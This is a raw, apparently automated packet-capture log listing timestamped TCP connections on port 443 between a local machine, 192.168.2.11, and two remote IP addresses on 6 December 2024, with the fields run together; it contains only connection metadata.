                                                          Dec 6, 2024 15:42:21.759785891 CET49761443192.168.2.113.219.243.226
                                                          Dec 6, 2024 15:42:21.759815931 CET443497613.219.243.226192.168.2.11
                                                          Dec 6, 2024 15:42:21.800110102 CET49761443192.168.2.113.219.243.226
                                                          Dec 6, 2024 15:42:22.170169115 CET443497613.219.243.226192.168.2.11
                                                          Dec 6, 2024 15:42:22.170281887 CET443497613.219.243.226192.168.2.11
                                                          Dec 6, 2024 15:42:22.170377016 CET49761443192.168.2.113.219.243.226
                                                          Dec 6, 2024 15:42:22.208043098 CET49761443192.168.2.113.219.243.226
                                                          Dec 6, 2024 15:42:22.208081961 CET443497613.219.243.226192.168.2.11
                                                          Dec 6, 2024 15:42:22.250941038 CET49767443192.168.2.113.219.243.226
                                                          Dec 6, 2024 15:42:22.250988007 CET443497673.219.243.226192.168.2.11
                                                          Dec 6, 2024 15:42:22.251061916 CET49767443192.168.2.113.219.243.226
                                                          Dec 6, 2024 15:42:22.251286030 CET49767443192.168.2.113.219.243.226
                                                          Dec 6, 2024 15:42:22.251297951 CET443497673.219.243.226192.168.2.11
                                                          Dec 6, 2024 15:42:23.670643091 CET443497673.219.243.226192.168.2.11
                                                          Dec 6, 2024 15:42:23.673717022 CET49767443192.168.2.113.219.243.226
                                                          Dec 6, 2024 15:42:23.673742056 CET443497673.219.243.226192.168.2.11
                                                          Dec 6, 2024 15:42:23.674899101 CET443497673.219.243.226192.168.2.11
                                                          Dec 6, 2024 15:42:23.675025940 CET49767443192.168.2.113.219.243.226
                                                          Dec 6, 2024 15:42:23.675035000 CET443497673.219.243.226192.168.2.11
                                                          Dec 6, 2024 15:42:23.675096035 CET49767443192.168.2.113.219.243.226
                                                          Dec 6, 2024 15:42:23.676182032 CET49767443192.168.2.113.219.243.226
                                                          Dec 6, 2024 15:42:23.676270008 CET443497673.219.243.226192.168.2.11
                                                          Dec 6, 2024 15:42:23.676413059 CET49767443192.168.2.113.219.243.226
                                                          Dec 6, 2024 15:42:23.676419020 CET443497673.219.243.226192.168.2.11
                                                          Dec 6, 2024 15:42:23.753247023 CET49767443192.168.2.113.219.243.226
                                                          Dec 6, 2024 15:42:23.753285885 CET443497673.219.243.226192.168.2.11
                                                          Dec 6, 2024 15:42:23.956398964 CET49767443192.168.2.113.219.243.226
                                                          Dec 6, 2024 15:42:24.120377064 CET443497673.219.243.226192.168.2.11
                                                          Dec 6, 2024 15:42:24.120471954 CET443497673.219.243.226192.168.2.11
                                                          Dec 6, 2024 15:42:24.120690107 CET49767443192.168.2.113.219.243.226
                                                          Dec 6, 2024 15:42:24.123091936 CET49767443192.168.2.113.219.243.226
                                                          Dec 6, 2024 15:42:24.123115063 CET443497673.219.243.226192.168.2.11
                                                          Dec 6, 2024 15:42:33.438138962 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:33.438209057 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:33.438332081 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:33.455034971 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:33.455080986 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:35.044363976 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:35.044476986 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:35.049441099 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:35.049473047 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:35.049843073 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:35.057562113 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:35.103331089 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:35.611522913 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:35.611557961 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:35.611654997 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:35.611681938 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:35.653199911 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:35.681723118 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:35.681744099 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:35.681865931 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:35.911286116 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:35.911300898 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:35.911370039 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:35.911406994 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:35.911432028 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:35.911459923 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:35.911492109 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:35.911592007 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:35.911636114 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:35.911643982 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:35.912075996 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:36.036505938 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.036631107 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:36.058254004 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.058341980 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:36.058356047 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.073559046 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.073633909 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:36.073652029 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.083854914 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.083975077 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:36.083988905 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.104396105 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.104563951 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:36.104578018 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.121937990 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.122059107 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:36.122081041 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.136166096 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.136296988 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:36.136315107 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.153774023 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.154251099 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:36.154268980 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.161464930 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.161664009 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:36.161675930 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.180073977 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.180202961 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:36.180222034 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.198287964 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.198362112 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.198405027 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:36.198425055 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.198445082 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:36.212455988 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.212538004 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.212616920 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:36.212635994 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.212661982 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:36.228120089 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.228262901 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:36.228281975 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.238219976 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.238296986 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:36.238313913 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.253317118 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.253359079 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.253432989 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:36.253454924 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.253468037 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:36.271791935 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.271975040 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:36.272005081 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.285185099 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.285232067 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.285362005 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:36.285386086 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.285399914 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:36.291085005 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.291183949 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:36.291194916 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.296107054 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.296185970 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:36.296200991 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.303170919 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.303244114 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:36.303261995 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.308727980 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.308883905 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:36.308893919 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.314496994 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.314579010 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:36.314589024 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.356359959 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:36.360121012 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.360138893 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.360239029 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:36.365959883 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.365969896 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.366053104 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:36.366077900 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.371700048 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.371794939 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:36.371818066 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.376838923 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.376923084 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:36.376950979 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.383639097 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.383724928 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:36.383744955 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.389487982 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.389565945 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:36.389588118 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.394567966 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.394633055 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:36.394649982 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.401261091 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.401329994 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:36.401348114 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.406335115 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.406399965 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:36.406415939 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.411639929 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.411703110 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:36.411724091 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.417150974 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.417251110 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:36.417268991 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.422235966 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.422331095 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:36.422353983 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.426323891 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.426393986 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:36.426413059 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.431231022 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:36.432785034 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.432862043 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:36.451441050 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.451519012 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:36.451539040 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.453948975 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:36.455532074 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.455596924 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:36.553132057 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.553239107 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:36.553273916 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.555783987 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.555841923 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:36.555856943 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.558307886 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.558456898 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:36.558485031 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.559581041 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.559792995 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:36.559803963 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.559844017 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:36.563307047 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.563376904 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:36.563385963 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.565484047 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.565545082 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:36.565553904 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.568056107 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.568111897 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:36.568121910 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.570352077 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.570408106 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:36.570424080 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.572401047 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.572443962 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:36.572462082 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.574697971 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.574762106 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:36.574775934 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.578310013 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.578368902 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:36.578383923 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.581120968 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.581187010 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:36.581199884 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.583595991 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.583650112 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:36.583662987 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.585289001 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.585336924 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:36.585349083 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.587812901 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.587889910 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:36.587901115 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.590607882 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.590671062 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:36.590683937 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.637610912 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:36.645515919 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.645596981 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:36.645620108 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.647587061 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.647644043 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:36.647658110 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.676661015 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:36.684137106 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:36.744455099 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.744530916 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:36.746855974 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.747001886 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:36.747013092 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.749620914 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.749680996 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:36.749689102 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.753010035 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.753077030 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:36.753084898 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.755439997 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.755506992 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:36.755517006 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.758260965 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.758322001 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:36.758332014 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.761395931 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.761445999 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:36.761452913 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.763942957 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.763993979 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:36.763999939 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.766654968 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.766725063 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:36.766731977 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.769282103 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.769392014 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:36.769429922 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.772249937 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.772315979 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:36.772325993 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.774770021 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.774827957 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:36.774844885 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.778093100 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.778175116 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:36.778191090 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.780661106 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.780716896 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:36.780734062 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.825037956 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:36.834660053 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.834676027 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.834760904 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:36.834788084 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.836793900 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.836886883 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:36.836901903 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.885247946 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:36.936403990 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.936417103 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.936497927 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:36.936534882 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.938486099 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.938549995 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.938575029 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:36.938597918 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.938615084 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:36.941039085 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.941098928 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:36.941117048 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.944291115 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.944377899 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:36.944403887 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.947016001 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.947073936 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:36.947101116 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.949675083 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.949755907 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:36.949778080 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.952248096 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.952353954 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:36.952363014 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.955447912 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.955537081 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:36.955569983 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.958059072 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.958141088 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:36.958154917 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.960742950 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.960822105 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:36.960860014 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.963752985 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.963849068 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:36.963876963 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.966227055 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.966321945 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:36.966355085 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.967961073 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.968009949 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:36.968036890 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.968276978 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:36.970500946 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.970568895 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:36.970597982 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:36.973077059 CET44349794101.99.75.174192.168.2.11
